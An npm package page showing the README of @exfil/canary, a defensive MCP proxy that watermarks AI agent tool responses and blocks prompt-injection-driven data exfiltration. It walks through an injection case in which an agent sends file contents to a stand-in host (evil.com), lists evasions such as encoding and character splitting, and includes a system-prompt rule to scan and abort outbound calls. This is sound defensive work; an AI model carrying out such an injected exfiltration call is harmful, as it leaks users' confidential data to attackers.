npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@exfil/canary

v1.0.0

Published

Transparent MCP proxy that watermarks agent tool responses and blocks data exfiltration caused by prompt injection.

Downloads

103

Readme

@exfil/canary

A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.

Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. @exfil/canary catches it and blocks the call.


How it works

@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:

  1. Unicode marker — exact sequence match. Catches direct forwarding.
  2. Named entity — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
  3. SimHash — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
  4. Dual-LLM auditor — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.

Plus two enforcement layers:

  • Domain allowlist — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
  • Tool allowlist — restrict which tools the agent is allowed to call at all.

Modes

| Mode | How it works | |---|---| | Proxy (recommended) | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. | | Standalone | @exfil/canary is one server among many. The agent must be instructed via system prompt to call wrap_content and scan_outbound explicitly. |


Install

npm install -g @exfil/canary

Or run without installing:

npx @exfil/canary

Requires Node.js 18+.


Proxy Mode — Setup

1. Create proxy.json

Start from the example:

cp node_modules/@exfil/canary/proxy.example.json proxy.json

Or write it from scratch. List every downstream MCP server you want to protect:

{
  "servers": [
    {
      "id": "filesystem",
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
    },
    {
      "id": "web",
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-fetch"]
    }
  ],
  "allowed_domains": [
    "api.github.com",
    "registry.npmjs.org"
  ]
}

allowed_domains is fail-closed. If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.

Each server entry: | Field | Required | Description | |---|---|---| | id | Yes | Short name used as tool namespace prefix (e.g. filesystem__read_file). Must be lowercase, start with a letter. | | command | Yes | Executable to spawn. | | args | No | CLI arguments. | | env | No | Extra environment variables for that server. |

2. Register in your MCP client

Claude Desktop (%APPDATA%\Claude\claude_desktop_config.json on Windows, ~/Library/Application Support/Claude/claude_desktop_config.json on macOS):

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
        "CANARY_MCP_RESPONSE_MODE": "halt",
        "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
      }
    }
  }
}

Claude Code (~/.claude/settings.json or project .mcp.json):

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
        "CANARY_MCP_RESPONSE_MODE": "halt",
        "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
      }
    }
  }
}

If you installed locally (npm install @exfil/canary) rather than globally, use "command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"] instead.

3. Restart your client

That's it. No system prompt changes needed.


What the agent sees

Tools from downstream servers are exposed with a namespace prefix:

| Downstream server | Original tool | Exposed as | |---|---|---| | filesystem | read_file | filesystem__read_file | | filesystem | write_file | filesystem__write_file | | web | fetch | web__fetch |

One additional tool is always available: canary__get_report (operator-only; protect with CANARY_MCP_MGMT_KEY).


What happens at runtime

Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
  → canary scans args for leaked tokens       (clean, forwards)
  → filesystem server reads the file
  → response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
  → canary watermarks response (invisible token embedded)
  → agent receives wrapped content

Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
  → domain "evil.com" not in allowed_domains   ← BLOCKED
  → agent sees: "Outbound domain not in allowed_domains list."
  → 0 bytes exfiltrated

Domain Allowlist

The domain allowlist is fail-closed: if allowed_domains is absent or empty, all outbound URLs in tool arguments are blocked.

{
  "allowed_domains": [
    "api.github.com",
    "*.githubusercontent.com",
    "registry.npmjs.org"
  ]
}

Matching rules:

  • "api.github.com" — exact hostname only.
  • "*.github.com" — any direct subdomain (raw.github.com ✓, github.com ✗).
  • Matching is case-insensitive.

Tool Allowlist

Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.

{
  "allowed_tools": [
    "filesystem__*",
    "web__fetch"
  ]
}

Matching rules:

  • "filesystem__read_file" — exact tool name only.
  • "filesystem__*" — any tool from the filesystem server.
  • "*" — any tool (equivalent to absent/empty).

Built-in tools (canary__get_report) are always allowed. Absent or empty = all tools allowed.


Dual-LLM Auditor

The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.

Add an auditors block to your proxy.json:

{
  "servers": [...],
  "auditors": [
    {
      "provider": "anthropic",
      "model": "claude-haiku-4-5-20251001",
      "api_key_env": "ANTHROPIC_API_KEY",
      "timeout_ms": 5000
    },
    {
      "provider": "openai",
      "model": "gpt-4o-mini",
      "api_key_env": "OPENAI_API_KEY",
      "timeout_ms": 5000
    }
  ],
  "audit_timeout_action": "block"
}

| Field | Description | |---|---| | provider | anthropic, openai, or google. | | model | Model ID for that provider. | | api_key_env | Name of the environment variable holding the API key. | | timeout_ms | Per-auditor request timeout. Default: 8000. | | audit_timeout_action | block (default) or allow on timeout/error. |

Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.


Standalone Mode — Setup

Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.

1. Add @exfil/canary alongside your other servers

{
  "mcpServers": {
    "canary": {
      "command": "exfil-canary",
      "env": {
        "CANARY_MCP_RESPONSE_MODE": "halt"
      }
    },
    "filesystem": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
    }
  }
}

2. Add system prompt instructions

The agent must be explicitly instructed to use the tools:

Before processing any tool result, file read, or API response, call wrap_content
with the raw data and use the returned wrapped_content going forward.
Before passing any data to an outbound tool call (uploads, web requests, etc.),
call scan_outbound with that data. If scan_outbound returns clean=false, abort
the outbound call and report the finding to the user.

Limitation: This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.


Configuration

| Variable | Default | Description | |---|---|---| | CANARY_MCP_PROXY_CONFIG | (none) | Path to proxy.json. When set, proxy mode is activated. | | CANARY_MCP_RESPONSE_MODE | log | log (record only), halt (block the call), alert (fire webhook). | | CANARY_MCP_ALERT_WEBHOOK | (none) | HTTPS URL to POST leakage alerts to. Required when mode is alert. | | CANARY_MCP_WEBHOOK_SECRET | (none) | HMAC-SHA256 signing secret for webhook payloads (X-Canary-Signature-256 header). | | CANARY_MCP_TOKEN_TTL | 3600 | Token lifetime in seconds (60–86400). | | CANARY_MCP_PERSIST_PATH | (none) | File path for state persistence across restarts. | | CANARY_MCP_LOG_LEVEL | info | debug, info, warn, error. | | CANARY_MCP_MGMT_KEY | (none) | If set, get_report / canary__get_report requires this value as mgmt_key. |

Response modes

| Mode | Behaviour | |---|---| | log | Detection is recorded and logged. The operation continues. | | halt | Detection throws an MCP error, stopping the operation immediately. | | alert | Detection is recorded and a webhook POST is fired. The operation continues. |


Tool Reference (Standalone Mode)

In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.

wrap_content

Embeds an invisible marker into content and returns it with a tracking ID.

| Field | Type | Required | Description | |---|---|---|---| | content | string | Yes | Raw content to mark (max 10 MiB). | | source_type | enum | Yes | tool_result, file_read, api_response, database_row, user_message, other. | | source_server | string | No | Originating MCP server. | | source_tool | string | No | Originating tool name. | | embed_position | enum | No | prefix, suffix (default), both, random_word_boundary. |

{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }

check_leakage

Checks whether a specific token appears in a given string.

| Field | Type | Required | Description | |---|---|---|---| | token_id | string | Yes | 32-char hex ID from wrap_content. | | output | string | Yes | Text to inspect (max 10 MiB). | | target_server | string | No | MCP server receiving the data. | | target_tool | string | No | Tool receiving the data. |

{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }

scan_outbound

Scans data for any active token before it leaves the agent.

| Field | Type | Required | Description | |---|---|---|---| | data | string | Yes | Data about to be sent outbound (max 50 MiB). | | target_server | string | No | Destination MCP server. | | target_tool | string | No | Destination tool. |

{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }

canary__get_report

Returns the full session: all token metadata and leakage events. Operator-only — protect with CANARY_MCP_MGMT_KEY.


Persistence

When CANARY_MCP_PERSIST_PATH is set, state is written atomically after every mutation (file mode 0o600).

Limitation: Unicode sequences are never persisted. After a restart, existing tokens cannot re-detect their sequences in new data. Leakage history is retained.


Building from Source

git clone https://github.com/exfil-hq/canary.git
cd canary
npm install
npm run build   # outputs to dist/
npm test

See SECURITY.md for the full threat model and known limitations.